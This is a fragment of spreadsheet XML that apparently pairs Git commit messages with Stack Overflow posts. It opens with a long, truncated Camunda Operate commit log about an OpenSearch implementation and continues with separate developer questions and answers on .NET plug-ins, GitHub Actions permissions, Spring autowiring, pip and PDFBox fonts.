* docs(opensearch): add opensearch implementation notes
Related with #5135
* docs(opensearch): add toc for opensearch implementation notes
Related with #5135
* docs(opensearch): add Zeebe client link
Related with #5135
* docs(opensearch): disable operationExecutor in opensearch docs
Related with #5135
* docs(opensearch): check for empty results in OpensearchImportStore
Related with #5135
* Be opensearch implementation 1.1 (#5206)
* feat(backend): Fix ElasticsearchChecks
* feat(backend): Fix TestElasticsearchSchemaManager
* feat(backend): Add TestOpensearchSchemaManager
* feat(backend): Add OpensearchArchiver
* feat(backend): Split OperateZeebeRule into ES/OS
* feat(backend): Add OpensearchChecks
* feat(backend): Add OpensearchUtil
* feat(backend): Fix ZeebeConnectorIT
* feat(backend): Split SearchTestRule into ES/OS
* feat(backend): Introduce DatabaseInfo
* feat(backend): Fix OpenSearchProcessStore
* feat(backend): Implement OpensearchImportStore.updateImportPositions
* feat(backend): Move getAllFlowNodeInstances to FlowNodeInstanceReader
* feat(backend): Add TestUtil.removeAllIndices for opensearch
* feat(backend): Implement finished, refreshOperateSearchIndices, refreshZeebeIndices, areIndicesAreCreated in OpensearchTestRuleProvider
* feat(backend): Implement OpensearchRecordsReader.readNextBatchByPositionAndPartition
* feat(backend): Minor fixes
* feat(backend): Implement OpensearchFlowNodeStore (#5208)
* feat(backend): Implement OpensearchFlowNodeStore
* feat(backend): Minor fixes
* Implement OpensearchIncidentStore (#5225)
* feat(backend): Implement OpensearchIncidentStore
* feat(backend): OpensearchIncidentStore fix
* Be opensearch implementation 1 opensearch metrics store (#5240)
* feat(backend): Introduce RichOpenSearchClient
* feat(backend): Implement OpensearchMetricsStore
* feat(backend): Implement OpensearchMetricsStore
* feat(backend): Implement OpensearchOperationStore (#5251)
* feat(backend): Implement OpensearchOperationStore
* feat(backend): Implement OpensearchOperationStore
* chore(backend): merge master commits (#5272)
* feat(backend): API endpoint for decision definition deletion (#5137)
feat(backend): API endpoint for decision definition deletion
- added REST endpoint and test
- added batch operation for decision definition deletion
Closes #4075
* test: add process instances filters e2e tests (#5142)
* test: add process instance variables e2e tests (#5144)
* test: add process instances table e2e tests (#5145)
* feat(backend): Permissions for decision definition deletion endpoint (#5148)
feat(backend): Permissions for decision definition deletion endpoint
- added DELETE permission check
Closes #5054
* feat(api): Add parentFlowNodeInstanceKey to process instance endpoint. #4971 (#5149)
* feat(backend): Add parentFlowNodeInstanceKey to process instance
feat(backend): Add parentFlowNodeInstanceKey to process instance
- Added field parentFlowNodeInstanceKey
Closes #4971
---------
Co-authored-by: Mihail &lt;122792941+mihail-ca@users.noreply.github.com&gt;
* ci: Fix Browserlist GHA (#5170)
* ci: Fix Browserlist GHA
* chore: Revert to Node 18
* test: fix flaky playwright e2e tests (#5171)
* chore: Update Browserlist DB
* feat(backend): Add handler for DELETE_DECISION_DEFINITION operation (#5157)
* feat(backend): Add handler for DELETE_DECISION_DEFINITION operation
feat(backend): Add handler for DELETE_DECISION_DEFINITION operation
- Added handler
Closes #5036
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* feat: display success notification on definition deletion (#5152)
* feat: display success notification on definition deletion
* chore: set delete definition feature flags to false
* chore: remove ThemeProvider from tests (#5058)
* chore: copy tests
* tests: update test selectors, remove theme provider
* chore: remove ThemeProvider from tests
* chore: remove most of the remaining ThemeProvider from Carbon tests
---------
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* chore(gha): dont trigger deploy-preview on closed PRs (#5179)
* fix: fix carbon migration issues (#5161)
* chore: remove legacy e2e tests (#5164)
* chore: remove legacy e2e tests
* chore: remove obsolete line from README
* chore(deps): update dependency @testing-library/jest-dom to v6.1.1 (#5182)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* feat(backend): return `tenantId` in Public API (#5096)
* assign `&lt;default&gt;` tenant to all `tenantId` fields for now
* return `tenantId` in all relevant Public API endpoints
closes #4930
* test: add process instance history e2e tests (#5150)
* test: add process instance history e2e tests
* test: remove unnecessary polls and fix expect
* chore: increase setup time for process instance history
* refactor: use getByRole selector for tree items
* chore: remove legacy components and routes (#5166)
* chore: remove legacy components and routes
* chore: remove unused constants and functions
* chore: remove common-ui (#5167)
* chore: remove old theme (#5168)
* chore: remove unused global styles (#5169)
* chore: remove carbon folders (#5175)
* fix(backend): Duplicate endpoints in Swagger public API (#5185)
fix(backend): Duplicate endpoints in Swagger public API
- updated Swagger documentation
Closes #5095
* fix(deps): update dependency styled-components to v6 (master) (#4933)
* fix(deps): update dependency styled-components to v6
* chore: fix rebase issues
* fix: fix theme switcher
---------
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* fix(deps): update dependency @carbon/elements to v11.28.0 (#5162)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* fix(deps): update dependency @carbon/react to v1.36.0 (#5165)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* fix(deps): update dependency sass to v1.66.1 (#5107)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* fix(deps): update dependency @camunda/camunda-composite-components to v0.1.3 (master) (#5062)
* fix(deps): update dependency @camunda/camunda-composite-components to v0.1.3
* style: strict style override for p
---------
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* fix(deps): update all non-major dependencies (master) (#5141)
* fix(deps): update all non-major dependencies
* chore: fix lint issue
* chore: update playwright version
---------
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* chore(deps): update stefanzweifel/git-auto-commit-action digest to 47a8ad5 (#5172)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* chore: Update Browserlist DB
* chore: add release github actions (#5105)
* chore: add release github actions
* chore: use password-stdin for docker login
* chore: create release using github token and upload artifacts to operate repo
* chore: remove unused commented plugins
* chore: remove javaVersion parameter
* fix(backend): Timeout when taking the backup (#5181)
fix(backend): Timeout when taking the backup
- Added additional check for failure, to keep waiting for backup on timeout exception
Closes #3982
* docs(swagger): Enum values added to object schemas (#5180)
Swagger annotations added for:
Process Instance
- state
Incident
-state
-type
Flownode Instance
-type
-state
Related to https://github.com/camunda/camunda-platform-docs/issues/1486
* Create codeql.yml
* feat(backend): decouple importer/importer-8.3 from Elasticsearch (#5094)
* feat(backend): introduce RecordsReader interface
Related with #4887
* feat(backend): renamed IncidentPostImportAction
Related with #4887
* feat(backend): move ELS related methods from FlowNodeInstanceZeebeRecordProcessor to FlowNodeStore
Related with #4887
* fix(backend-test): fix import error
Related with #4887
* feat(backend): remove ELS from ListViewZeebeRecordProcessor (importer-8.3)
Related with #4887
* feat(backend): remove ELS from ProcessZeebeRecordProcessor (importer-8.3)
Related with #4887
* feat(backend): remove ELS from ListView and ProcessZeebeRecordProcessor
- remove ElasticsearchQueries
- rename ElasticsearchBulkProcessor to ImportBulkProcessor
Related with #4887
* fix(backend): use Zeebe Record not java...Record
Related with #4887
* fix(backend-test): use OperateZeebeIntegrationTest in ReindexIT
Related with #4887
* refactor: get rid of node-fetch dependency (#5186)
* fix: add request mocks to modification test (#5190)
* chore: split tests
* test: mock requests before applying modifications
* chore: fix act warnings for ProcessInstance/modifications.test.tsx
* test: fix act warning
---------
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* feat(backend): API endpoint for process definition deletion (#5197)
feat(backend): API endpoint for process definition deletion
- added REST endpoint and test
- added batch operation for process definition deletion
Closes #4076
* feat(backend): add `tenantId` to `POST /api/process-instances` (#5202)
* return `tenantId` for each process instance
* allow filtering by `tenantId`
closes #5099
* feat: configuration flag to enable/disable multi tenancy (#5210)
* chore(preview-env): Add a new workflow to clean up preview environments (#5153)
* feat: add weekly docker image workflow (#5215)
* ci: add weekly-internal-docker-images.yaml
* fix: use correct cron notation
* ci: use quotes for cron job
* ci: update workflow
Use correct docker image. Set the docker tag correctly.
* Update workload-identity-provider and service_account
* ci: add permissions
Add missing permissions to workflow
https://stackoverflow.com/questions/73626841/google-github-actions-auth-failed-with-did-not-inject-actions-id-token-request/73626864#73626864
* ci: checkout first and add more parameters
* Checkout the repo before login (google auth complained here)
* Add caches for gcr.io
---------
Co-authored-by: Ralf Puchert &lt;49151958+ralfpuchert@users.noreply.github.com&gt;
* chore(deps): bump org.yaml:snakeyaml from 2.0 to 2.2 (#5195)
Bumps [org.yaml:snakeyaml](https://bitbucket.org/snakeyaml/snakeyaml) from 2.0 to 2.2.
- [Commits](https://bitbucket.org/snakeyaml/snakeyaml/branches/compare/snakeyaml-2.2..snakeyaml-2.0)
---
updated-dependencies:
- dependency-name: org.yaml:snakeyaml
  dependency-type: direct:production
  update-type: version-update:semver-minor
...
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
Co-authored-by: dependabot[bot] &lt;49699333+dependabot[bot]@users.noreply.github.com&gt;
* chore(deps): bump org.springdoc:springdoc-openapi-starter-webmvc-ui (#5139)
Bumps [org.springdoc:springdoc-openapi-starter-webmvc-ui](https://github.com/springdoc/springdoc-openapi) from 2.1.0 to 2.2.0.
- [Release notes](https://github.com/springdoc/springdoc-openapi/releases)
- [Changelog](https://github.com/springdoc/springdoc-openapi/blob/main/CHANGELOG.md)
- [Commits](https://github.com/springdoc/springdoc-openapi/compare/v2.1.0...v2.2.0)
---
updated-dependencies:
- dependency-name: org.springdoc:springdoc-openapi-starter-webmvc-ui
  dependency-type: direct:production
  update-type: version-update:semver-minor
...
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
Co-authored-by: dependabot[bot] &lt;49699333+dependabot[bot]@users.noreply.github.com&gt;
* chore(deps): bump com.auth0:jwks-rsa from 0.22.0 to 0.22.1 (#5023)
Bumps [com.auth0:jwks-rsa](https://github.com/auth0/jwks-rsa-java) from 0.22.0 to 0.22.1.
- [Release notes](https://github.com/auth0/jwks-rsa-java/releases)
- [Changelog](https://github.com/auth0/jwks-rsa-java/blob/master/CHANGELOG.md)
- [Commits](https://github.com/auth0/jwks-rsa-java/compare/0.22.0...0.22.1)
---
updated-dependencies:
- dependency-name: com.auth0:jwks-rsa
  dependency-type: direct:production
  update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
Co-authored-by: dependabot[bot] &lt;49699333+dependabot[bot]@users.noreply.github.com&gt;
* feat: store user's tenants in session (#5214)
* feat(backend): add tenantId to `GET /api/decisions/grouped` (#5238)
* change GET to POST to allow request body
* return `tenantId` for each decision group
* allow filtering by `tenantId`
closes #5102
* feat(backend): return tenants in GET `/api/authentications/user` (#5230)
closes #5098
* feat(backend): add `tenantId` to `POST /api/decision-instances` (#5211)
* return `tenantId` for each decision instance
* allow filtering by `tenantId`
closes #5101
* chore(test): mark Elasticsearch changes... (#5241)
not to lose when implementing Opensearch
* chore(deps): bump org.testcontainers:elasticsearch from 1.18.3 to 1.19.0 (#5221)
Bumps [org.testcontainers:elasticsearch](https://github.com/testcontainers/testcontainers-java) from 1.18.3 to 1.19.0.
- [Release notes](https://github.com/testcontainers/testcontainers-java/releases)
- [Changelog](https://github.com/testcontainers/testcontainers-java/blob/main/CHANGELOG.md)
- [Commits](https://github.com/testcontainers/testcontainers-java/compare/1.18.3...1.19.0)
---
updated-dependencies:
- dependency-name: org.testcontainers:elasticsearch
  dependency-type: direct:production
  update-type: version-update:semver-minor
...
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
Co-authored-by: dependabot[bot] &lt;49699333+dependabot[bot]@users.noreply.github.com&gt;
* chore(deps): bump version.micrometer from 1.11.2 to 1.11.3 (#5218)
Bumps `version.micrometer` from 1.11.2 to 1.11.3.
Updates `io.micrometer:micrometer-registry-prometheus` from 1.11.2 to 1.11.3
- [Release notes](https://github.com/micrometer-metrics/micrometer/releases)
- [Commits](https://github.com/micrometer-metrics/micrometer/compare/v1.11.2...v1.11.3)
Updates `io.micrometer:micrometer-core` from 1.11.2 to 1.11.3
- [Release notes](https://github.com/micrometer-metrics/micrometer/releases)
- [Commits](https://github.com/micrometer-metrics/micrometer/compare/v1.11.2...v1.11.3)
---
updated-dependencies:
- dependency-name: io.micrometer:micrometer-registry-prometheus
  dependency-type: direct:development
  update-type: version-update:semver-patch
- dependency-name: io.micrometer:micrometer-core
  dependency-type: direct:production
  update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
Co-authored-by: dependabot[bot] &lt;49699333+dependabot[bot]@users.noreply.github.com&gt;
* chore(deps): bump license-maven-plugin from 4.1 to 4.2 (#4289)
Bumps license-maven-plugin from 4.1 to 4.2.
---
updated-dependencies:
- dependency-name: com.mycila:license-maven-plugin
  dependency-type: direct:production
  update-type: version-update:semver-minor
...
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
Co-authored-by: dependabot[bot] &lt;49699333+dependabot[bot]@users.noreply.github.com&gt;
* chore(deps): bump com.auth0:mvc-auth-commons from 1.9.5 to 1.10.0 (#4973)
Bumps [com.auth0:mvc-auth-commons](https://github.com/auth0/auth0-java-mvc-common) from 1.9.5 to 1.10.0.
- [Release notes](https://github.com/auth0/auth0-java-mvc-common/releases)
- [Changelog](https://github.com/auth0/auth0-java-mvc-common/blob/master/CHANGELOG.md)
- [Commits](https://github.com/auth0/auth0-java-mvc-common/compare/1.9.5...1.10.0)
---
updated-dependencies:
- dependency-name: com.auth0:mvc-auth-commons
  dependency-type: direct:production
  update-type: version-update:semver-minor
...
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
Co-authored-by: dependabot[bot] &lt;49699333+dependabot[bot]@users.noreply.github.com&gt;
* chore(deps): bump semver dependency (#5248)
* test: add visual regression tests for dashboard page (#5194)
* test: add visual regression tests for dashboard page
* refactor: simplify function type
* test: add visual regression tests for decision detail page (#5196)
* test: add visual regression tests for processes page (#5198)
* test: add visual regression tests for processes page
* refactor: simplify function type
* test: add visual regression tests for decisions page (#5204)
* test: add visual regression tests for decisions page
* refactor: simplify function type
* chore: update camunda composite components (#5257)
* feat(backend): expose `multiTenancyEnabled` in `client-config.json` (#5224)
* feat(backend): expose `multiTenancyEnabled` in `client-config.json`
closes #5223
* chore(test): fix tests
* feat(backend): allow configuring where to read parent data from (#5203)
* feat(backend): allow configuring where to read parent data from
* chore(test): mark Elasticsearch changes...
not to lose when implementing Opensearch
* feat: get tenants for given M2M token from identity (#5242)
* chore: delete unnecessary warning (#5261)
* chore: Update Browserlist DB
* feat(backend): add `tenantId` to `GET /api/processes/grouped` (#5222)
* feat(backend): add `tenantId` to `GET /api/processes/grouped`
* change GET to POST to allow request body
* return `tenantId` for each process group
* allow filtering by `tenantId`
closes #5100
* chore(backend): extend test case
* fix(test): fix test to use POST method instead of GET
* chore(test): fix tests
* chore(deps): bump version.spring.boot from 3.1.2 to 3.1.3 (#5246)
Bumps `version.spring.boot` from 3.1.2 to 3.1.3.
Updates `org.springframework.boot:spring-boot-dependencies` from 3.1.2 to 3.1.3
- [Release notes](https://github.com/spring-projects/spring-boot/releases)
- [Commits](https://github.com/spring-projects/spring-boot/compare/v3.1.2...v3.1.3)
Updates `org.springframework.boot:spring-boot-maven-plugin` from 3.1.2 to 3.1.3
- [Release notes](https://github.com/spring-projects/spring-boot/releases)
- [Commits](https://github.com/spring-projects/spring-boot/compare/v3.1.2...v3.1.3)
---
updated-dependencies:
- dependency-name: org.springframework.boot:spring-boot-dependencies
  dependency-type: direct:production
  update-type: version-update:semver-patch
- dependency-name: org.springframework.boot:spring-boot-maven-plugin
  dependency-type: direct:production
  update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
Co-authored-by: dependabot[bot] &lt;49699333+dependabot[bot]@users.noreply.github.com&gt;
* chore(ci): remove PVCs from stage env config (#5264)
* fix(backend-sec): use decisionDefinitionId as Long (#5247)
* fix(backend-sec): use decisionDefinitionId as Long
* feat(backend): use ValidLong for validating decisionDefinitionId
- Use the old way to for error message in permission check
* fix(backend): use SearchTestRule in tests
---------
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
Co-authored-by: mihail-ca &lt;122792941+mihail-ca@users.noreply.github.com&gt;
Co-authored-by: Hüsna Uygur &lt;45518829+huygur@users.noreply.github.com&gt;
Co-authored-by: johanwelgemoed &lt;112612181+johanwelgemoed@users.noreply.github.com&gt;
Co-authored-by: Vinícius Goulart &lt;vinicius.goulart@camunda.com&gt;
Co-authored-by: vsgoulart &lt;vsgoulart@users.noreply.github.com&gt;
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
Co-authored-by: Patrick Dehn &lt;pedesen@users.noreply.github.com&gt;
Co-authored-by: Lars Lange &lt;9141483+Langleu@users.noreply.github.com&gt;
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
Co-authored-by: Svetlana Dorokhova &lt;svetlana.dorokhova@camunda.com&gt;
Co-authored-by: Roman Smirnov &lt;roman.smirnov@camunda.com&gt;
Co-authored-by: Clément Nero &lt;clement.nero@camunda.com&gt;
Co-authored-by: Christopher Kujawa (Zell) &lt;zelldon91@googlemail.com&gt;
Co-authored-by: dependabot[bot] &lt;49699333+dependabot[bot]@users.noreply.github.com&gt;
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Implement OpenSearchProcessStore (#5271)
* feat(backend): Implement OpenSearchProcessStore
* feat(backend): Implement OpensearchBatchRequest
* feat(backend): remove ELS deps from MigrationProperties (#5279)
* fix(backend-tests) fix backend integration tests (#5281)
* fix(backend-tests):Use annotation Conditional
* fix(backend-tests):include ZeebeImporter for ModulesTestApplication
* feat(backend): Implement OpensearchBatchRequest (#5278)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* fix(backend): remove duplicated @Conditional annotation
* fix(backend): RichOpenSearchClient (#5284)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Implement OpensearchFlowNodeStore (#5290)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Implement OpensearchListViewStore (#5291)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Implement OpensearchDecisionStore (#5288)
* feat(backend): Implement OpensearchDecisionStore
* feat(backend): Implement OpensearchDecisionStore
---------
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* test(backend): add OpensearchBatchRequest tests (#5295)
* fix(backend): remove duplicated @Conditional annotation
* test(backend): add OpensearchBatchRequestIT
* fix(backend): Fix opensearch ndjson serialization (#5293)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): distinguish opensearch and elasticsearch index prefixes
* feat(backend): add search index method for DSL
* feat(backend): refactoring
* test(backend): add update and add tests
* feat(backend): add fix and test for upsert
* feat(backend): add fix upsert with routing
* feat(backend): rename DSL searchRequestBuilder method
---------
Co-authored-by: Oleksandr Kriuchenko &lt;105281107+oleksandr-kriuchenko-lohika@users.noreply.github.com&gt;
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* Implement OpensearchSequenceFlowStore (#5308)
* feat(backend): Implement OpensearchSequenceFlowStore
* feat(backend): Reorganize OpensearchDSL
---------
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): implement Opensearch importer (#5333)
* feat(backend): add OpensearchDSL methods
* feat(backend): read Opensearch record as JSON string
* fix(backend): disable post importer
* fix(backend): fix bug in creating List with null items with `List.of`
* fix(backend): fix bug in updating import-position index
* feat(backend): Implement OpenSearchProcessStore (#5294)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* fix(backend): Fix aggregation in OpenSearchProcessStore.getCoreStatistics (#5352)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Combine RichOpenSearchClient, RetryOpenSearchClient, OpenSearchTask and OpensearchUtil (#5340)
* feat(backend): Implement OpensearchTaskStore
* feat(backend): Implement OpensearchTaskStore
* feat(backend): Implement OpensearchIncidentStatisticsReader
* feat(backend): Implement OpensearchTaskStore
* feat(backend): Implement OpensearchIncidentStatisticsReader
---------
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Implement OpensearchIncidentStatisticsReader (#5386)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Implement OpensearchBatchOperationReader (#5387)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Implement OpensearchListViewReader (#5394)
* feat(backend): Implement OpensearchListViewReader
* feat(backend): Implement OpensearchListViewReader
---------
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Implement OpensearchOperationReader (#5408)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* fix(backend): Fix OpensearchBatchRequest (#5409)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* fix(backend): Fix JacksonConfig: allow constructors (#5412)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* feat(backend): Opensearch implementation for PostImportAction (#5413)
* chore(project): use Opensearch 2.5
* clean(backend): remove unused import
* feat(backend): add OpensearchIncidentPostImportAction
* feat(backend): enable post importer
* fix(backend): fix null position in query
* feat(backend): Implement OpensearchBatchOperationWriter (#5414)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* fix(backend): Fix OpensearchIncidentStatisticsReader.getIncidentsByErrorMsgStatistic (#5416)
Co-authored-by: Oleksandr Kriuchenko &lt;okriuchenko@lohika.com&gt;
* chore(project): merge master  (#5422)
* feat(backend): API endpoint for decision definition deletion (#5137)
feat(backend): API endpoint for decision definition deletion
- added REST endpoint and test
- added batch operation for decision definition deletion
Closes #4075
* test: add process instances filters e2e tests (#5142)
* test: add process instance variables e2e tests (#5144)
* test: add process instances table e2e tests (#5145)
* feat(backend): Permissions for decision definition deletion endpoint (#5148)
feat(backend): Permissions for decision definition deletion endpoint
- added DELETE permission check
Closes #5054
* feat(api): Add parentFlowNodeInstanceKey to process instance endpoint. #4971 (#5149)
* feat(backend): Add parentFlowNodeInstanceKey to process instance
feat(backend): Add parentFlowNodeInstanceKey to process instance
- Added field parentFlowNodeInstanceKey
Closes #4971
---------
Co-authored-by: Mihail &lt;122792941+mihail-ca@users.noreply.github.com&gt;
* ci: Fix Browserlist GHA (#5170)
* ci: Fix Browserlist GHA
* chore: Revert to Node 18
* test: fix flaky playwright e2e tests (#5171)
* chore: Update Browserlist DB
* feat(backend): Add handler for DELETE_DECISION_DEFINITION operation (#5157)
* feat(backend): Add handler for DELETE_DECISION_DEFINITION operation
feat(backend): Add handler for DELETE_DECISION_DEFINITION operation
- Added handler
Closes #5036
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* feat: display success notification on definition deletion (#5152)
* feat: display success notification on definition deletion
* chore: set delete definition feature flags to false
* chore: remove ThemeProvider from tests (#5058)
* chore: copy tests
* tests: update test selectors, remove theme provider
* chore: remove ThemeProvider from tests
* chore: remove most of the remaining ThemeProvider from Carbon tests
---------
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* chore(gha): dont trigger deploy-preview on closed PRs (#5179)
* fix: fix carbon migration issues (#5161)
* chore: remove legacy e2e tests (#5164)
* chore: remove legacy e2e tests
* chore: remove obsolete line from README
* chore(deps): update dependency @testing-library/jest-dom to v6.1.1 (#5182)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* feat(backend): return `tenantId` in Public API (#5096)
* assign `&lt;default&gt;` tenant to all `tenantId` fields for now
* return `tenantId` in all relevant Public API endpoints
closes #4930
* test: add process instance history e2e tests (#5150)
* test: add process instance history e2e tests
* test: remove unnecessary polls and fix expect
* chore: increase setup time for process instance history
* refactor: use getByRole selector for tree items
* chore: remove legacy components and routes (#5166)
* chore: remove legacy components and routes
* chore: remove unused constants and functions
* chore: remove common-ui (#5167)
* chore: remove old theme (#5168)
* chore: remove unused global styles (#5169)
* chore: remove carbon folders (#5175)
* fix(backend): Duplicate endpoints in Swagger public API (#5185)
fix(backend): Duplicate endpoints in Swagger public API
- updated Swagger documentation
Closes #5095
* fix(deps): update dependency styled-components to v6 (master) (#4933)
* fix(deps): update dependency styled-components to v6
* chore: fix rebase issues
* fix: fix theme switcher
---------
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* fix(deps): update dependency @carbon/elements to v11.28.0 (#5162)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* fix(deps): update dependency @carbon/react to v1.36.0 (#5165)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* fix(deps): update dependency sass to v1.66.1 (#5107)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* fix(deps): update dependency @camunda/camunda-composite-components to v0.1.3 (master) (#5062)
* fix(deps): update dependency @camunda/camunda-composite-components to v0.1.3
* style: strict style override for p
---------
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* fix(deps): update all non-major dependencies (master) (#5141)
* fix(deps): update all non-major dependencies
* chore: fix lint issue
* chore: update playwright version
---------
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
Co-authored-by: Hüsna Uygur &lt;husna.uygur@camunda.com&gt;
* chore(deps): update stefanzweifel/git-auto-commit-action digest to 47a8ad5 (#5172)
Co-authored-by: renovate[bot] &lt;29139614+renovate[bot]@users.noreply.github.com&gt;
* chore: Update Browserlist DB
* chore: add release github actions (#5105)
* chore: add release github actions
* chore: use password-stdin for docker login
* chore: create release using github token and upload artifacts to operate repo
* chore: remove unused commented plugins
* chore: remove javaVersion parameter
* fix(backend): Timeout when taking the backup (#5181)
fix(backend): Timeout when taking the backup
- Added additional check for failure, to keep waiting for backup on timeout exception
Closes #3982
* docs(swagger): Enum values added to object schemas (#5180)
Swagger annotations added for:
Process Instance
- state
Incident
-state
-type
Flownode I</t>
  </si>
  <si>
    <t xml:space="preserve">Aloha
Given a plug-in architecture (C# / .NET 3.5) with the plug-ins stored in the GAC, how can I list/load all dll's that contain types that implement my specific interface? In other words, I'd like to investigate which plug-ins for my application are installed on a machine, by looking in the GAC.
-Edoode
</t>
  </si>
  <si>
    <t>I needed to add:
jobs:
   my_job:
   # Need to add these 3 lines to add "id-token" with the intended permissions.
   permissions:
     contents: 'read'
     id-token: 'write'
This is documented here: https://github.com/google-github-actions/auth#usage</t>
  </si>
  <si>
    <t>C771</t>
  </si>
  <si>
    <t xml:space="preserve"> Only load the testing service if it's available
Since the testing tickets component is only loaded at
certain profiles, it can't be autowired by default.
For this reason, marking all the services that tries
to autowire the testing service.
https://stackoverflow.com/questions/57656119/how-to-autowire-conditionally-in-spring-boot/57656242#57656242</t>
  </si>
  <si>
    <t>You can use @Autowired(required=false) and null check in stopScheduler method.
 @Autowired(required=false)
 private TestSchedulderNew testSchedulderNew;
 @GetMapping(value = "/stopScheduler")
 public String stopSchedule() {
     if (testSchedulderNew != null) {
         postProcessor.postProcessBeforeDestruction(testSchedulderNew, 
          SCHEDULED_TASKS);
         return "OK";
     }
     return "NOT_OK";
 }</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Because of some certain projects I need to run python 3.9 (32-bit) as my main python interpreter. But now I realised some problems when i try to use python 3.13 (64-bit). After installation of both versions pip from python 3.13 does not work anymore and i get following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Could not import runpy module
Traceback (most recent call last):
  File &amp;quot;&amp;lt;frozen runpy&amp;gt;&amp;quot;, line 15, in &amp;lt;module&amp;gt;
  File &amp;quot;&amp;lt;frozen importlib.util&amp;gt;&amp;quot;, line 2, in &amp;lt;module&amp;gt;
ModuleNotFoundError: No module named 'importlib._abc'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and as soon as I uninstall just the python 3.9-32 version it works all of the sudden... I also tried to reinstall python 3.9-32 but as soon as both versions are installed the pip wont work with python 3.13...
Thank you for your help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C772</t>
  </si>
  <si>
    <t>New ReuseExistingFont test focusing on the stack overflow question
PDFBox: No glyph for U+0050 in extracted font
https://stackoverflow.com/questions/61934819/pdfbox-no-glyph-for-u0050-in-extracted-font
protokol.pdf
https://github.com/sutr90/pdfbox-font-problem/raw/master/protokol.pdf
testReuseProtokolLikeJnovacho - Indeed, the font in question cannot be reused. One cause is that PDCIDFontType2.encode(int) has an open TODO (to reverse map ToUnicode), another that the font has no cmap.</t>
  </si>
  <si>
    <t>Here you actually ran into an open PDFBox TODO, your stream.showText eventually calls encode of the underlying CID font for each character and here we have:
public class PDCIDFontType2 extends PDCIDFont
{
    ...
    public byte[] encode(int unicode)
    {
        int cid = -1;
        if (isEmbedded)
        {
            ...
            // otherwise we require an explicit ToUnicode CMap
            if (cid == -1)
            {
                //TODO: invert the ToUnicode CMap?
